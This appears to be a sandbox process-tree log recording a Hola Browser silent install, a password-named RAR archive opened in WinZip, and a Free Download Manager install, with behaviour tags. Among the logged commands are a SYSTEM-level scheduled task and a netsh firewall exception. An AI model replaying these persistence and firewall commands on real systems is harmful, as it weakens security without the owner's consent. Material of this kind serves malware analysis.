C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8376 /prefetch:12⤵PID:3168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=134 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10084 /prefetch:12⤵PID:1696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9180 /prefetch:82⤵PID:3524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3100 /prefetch:82⤵PID:5064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9376 /prefetch:82⤵PID:4068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8124 /prefetch:82⤵PID:5520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8252 /prefetch:82⤵PID:2380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3304 /prefetch:82⤵PID:2864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5964 /prefetch:82⤵PID:5660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=142 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9096 /prefetch:12⤵PID:2408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3124 /prefetch:82⤵PID:1416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=144 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9288 /prefetch:12⤵PID:3136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=145 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8868 /prefetch:12⤵PID:5356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8000 /prefetch:82⤵PID:1960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1520 /prefetch:82⤵PID:5900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3036 /prefetch:82⤵PID:5176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8004 /prefetch:82⤵PID:4352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6376 /prefetch:82⤵PID:3216
-
-
C:\Users\Admin\Downloads\Hola-Browser-Agreed-Inst-C-Amb3.exe"C:\Users\Admin\Downloads\Hola-Browser-Agreed-Inst-C-Amb3.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
PID:260 -
C:\Users\Admin\Downloads\Hola-Browser-Agreed-Inst-C-Amb3.exe"C:\Users\Admin\Downloads\Hola-Browser-Agreed-Inst-C-Amb3.exe" --monitor 18723⤵
- Executes dropped EXE
PID:1816 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 17284⤵
- Program crash
PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\Hola-Setup-x64-1.203.908.exe"C:\Users\Admin\AppData\Local\Temp\Hola-Setup-x64-1.203.908.exe" --silent --agree --app browser --campaign amb3 --no-run-uis --no-rmt-conf --no-updater --no-hola-cr --track-download 6381d0a67ef1985987307a3a --hola-domain holavpninstaller.com3⤵
- Executes dropped EXE
PID:216 -
C:\Program Files\Hola\app\net_updater64.exe"C:\Program Files\Hola\app\net_updater64.exe" --install win_hola.browser.hola.org4⤵
- Executes dropped EXE
PID:808
-
-
-
C:\Users\Admin\AppData\Local\Temp\Hola-Setup-x64-1.203.908.exe"C:\Users\Admin\AppData\Local\Temp\Hola-Setup-x64-1.203.908.exe" --silent --agree --app browser --campaign amb3 --no-run-uis --no-rmt-conf --no-updater --no-svc --hola-cr-path "C:\\Users\\Admin\\AppData\\Local\\Temp\\chromium-103.0.5060.114.12.zip" --track-download 6381d0a67ef1985987307a3a --hola-domain holavpninstaller.com3⤵
- Executes dropped EXE
PID:4040 -
C:\Program Files\Hola\app\7za.exe"C:\Program Files\Hola\app\7za.exe" x -o"C:\Program Files\Hola\temp" "C:\\Users\\Admin\\AppData\\Local\\Temp\\chromium-103.0.5060.114.12.zip" "chromium"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2084
-
-
-
C:\Users\Admin\AppData\Local\Temp\Hola-Setup-x64-1.203.908.exe"C:\Users\Admin\AppData\Local\Temp\Hola-Setup-x64-1.203.908.exe" --post-install-run --no-rmt-conf --app browser --track-download 6381d0a67ef1985987307a3a3⤵
- Executes dropped EXE
PID:5864 -
C:\Windows\explorer.exeexplorer "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hola Browser.lnk"4⤵PID:3752
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=151 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:12⤵PID:1172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=152 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:12⤵PID:9556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=153 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:12⤵PID:6508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=154 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:12⤵PID:6584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9020 /prefetch:82⤵PID:1112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7768 /prefetch:82⤵PID:1908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=157 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:12⤵PID:9256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=158 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9556 /prefetch:12⤵PID:4864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=159 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8200 /prefetch:12⤵PID:6332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=160 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9528 /prefetch:12⤵PID:9348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=161 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:12⤵PID:8416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=162 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:12⤵PID:7208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=163 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9428 /prefetch:12⤵PID:7640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=164 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:12⤵PID:8628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=165 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7668 /prefetch:12⤵PID:6844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=166 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:12⤵PID:9484
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=167 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9008 /prefetch:12⤵PID:3468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=168 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7448 /prefetch:12⤵PID:7020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9988 /prefetch:82⤵PID:7032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=172 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:12⤵PID:7100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6032 /prefetch:82⤵PID:5404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6908 /prefetch:82⤵PID:6040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8408 /prefetch:82⤵PID:8556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=169 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7668 /prefetch:12⤵PID:7084
-
-
C:\Program Files\WinZip\winzip64.exe"C:\Program Files\WinZip\winzip64.exe" "C:\Users\Admin\Downloads\Active_File_1234pass_L9.rar"2⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookAW
- Suspicious use of SetWindowsHookEx
PID:8752 -
C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"C:\Program Files\WinZip\WzCABCacheSyncHelper64.exe"3⤵PID:7884
-
-
C:\Program Files\WinZip\WzWipe32.exe"C:\Program Files\WinZip\WzWipe32.exe" "C:\Users\Admin\AppData\Local\Temp\wze648" /nWinZip3⤵PID:2524
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9108 /prefetch:82⤵PID:7600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=176 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2528 /prefetch:12⤵PID:8472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=177 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8568 /prefetch:12⤵PID:6148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=178 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:12⤵PID:7012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=179 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:12⤵PID:5772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=180 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:12⤵PID:7944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=181 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7088 /prefetch:12⤵PID:3196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=182 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:12⤵PID:7844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=183 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9360 /prefetch:12⤵PID:432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=185 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1520 /prefetch:12⤵PID:7636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=184 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:12⤵PID:7344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=186 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1108 /prefetch:12⤵PID:9536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=187 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9352 /prefetch:12⤵PID:9220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6440 /prefetch:82⤵PID:8320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4660 /prefetch:82⤵PID:4372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7328 /prefetch:82⤵PID:8008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5988 /prefetch:82⤵PID:8392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5804 /prefetch:82⤵PID:3856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9124 /prefetch:82⤵PID:5684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8376 /prefetch:82⤵PID:7640
-
-
C:\Users\Admin\Downloads\fdm_x64_setup.exe"C:\Users\Admin\Downloads\fdm_x64_setup.exe"2⤵PID:7108
-
C:\Users\Admin\AppData\Local\Temp\is-9JQ85.tmp\fdm_x64_setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-9JQ85.tmp\fdm_x64_setup.tmp" /SL5="$D0484,34943088,780288,C:\Users\Admin\Downloads\fdm_x64_setup.exe"3⤵
- Drops file in Program Files directory
- Modifies Internet Explorer settings
PID:7396 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /end /tn FreeDownloadManagerHelperService4⤵PID:6084
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /create /RU SYSTEM /tn FreeDownloadManagerHelperService /f /xml "C:\Program Files\Softdeluxe\Free Download Manager\service.xml"4⤵
- Creates scheduled task(s)
PID:6816
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /change /tn FreeDownloadManagerHelperService /tr "\"C:\Program Files\Softdeluxe\Free Download Manager\helperservice.exe"\"4⤵PID:3408
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /run /tn FreeDownloadManagerHelperService4⤵PID:9080
-
-
C:\Program Files\Softdeluxe\Free Download Manager\fdm.exe"C:\Program Files\Softdeluxe\Free Download Manager\fdm.exe" --install4⤵
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:7044 -
C:\Program Files\Softdeluxe\Free Download Manager\importwizard.exe"C:\Program Files\Softdeluxe\Free Download Manager\importwizard" 3FE02402165644D986B63DE6638495E45⤵PID:3032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.freedownloadmanager.org/afterinstall.html?os=windows&osversion=10&osarchitecture=x86_64&architecture=x86_64&version=6.18.1.4920&uuid=89989b3a-aeaf-4847-9588-cfa24f4312f9&locale=en_US&ac=1&au=15⤵
- Adds Run key to start application
- Enumerates system info in registry
PID:9292 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffebe9346f8,0x7ffebe934708,0x7ffebe9347186⤵PID:2124
-
-
-
-
C:\Program Files\Softdeluxe\Free Download Manager\fdm5rhwin.exe"C:\Program Files\Softdeluxe\Free Download Manager\fdm5rhwin.exe" 21907CB0205CFF989F82C03684A01B86 phase14⤵PID:6388
-
-
C:\Program Files\Softdeluxe\Free Download Manager\fdm5rhwin.exe"C:\Program Files\Softdeluxe\Free Download Manager\fdm5rhwin.exe" 21907CB0205CFF989F82C03684A01B86 phase24⤵PID:6376
-
-
C:\Windows\system32\netsh.exe"netsh.exe" firewall add allowedprogram program="C:\Program Files\Softdeluxe\Free Download Manager\fdm.exe" name="Free Download Manager" ENABLE scope=ALL profile=ALL4⤵
- Modifies Windows Firewall
PID:8856
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1644,8475954625888387476,7555143609282686247,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=195 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7660 /prefetch:12⤵PID:5012
-
-
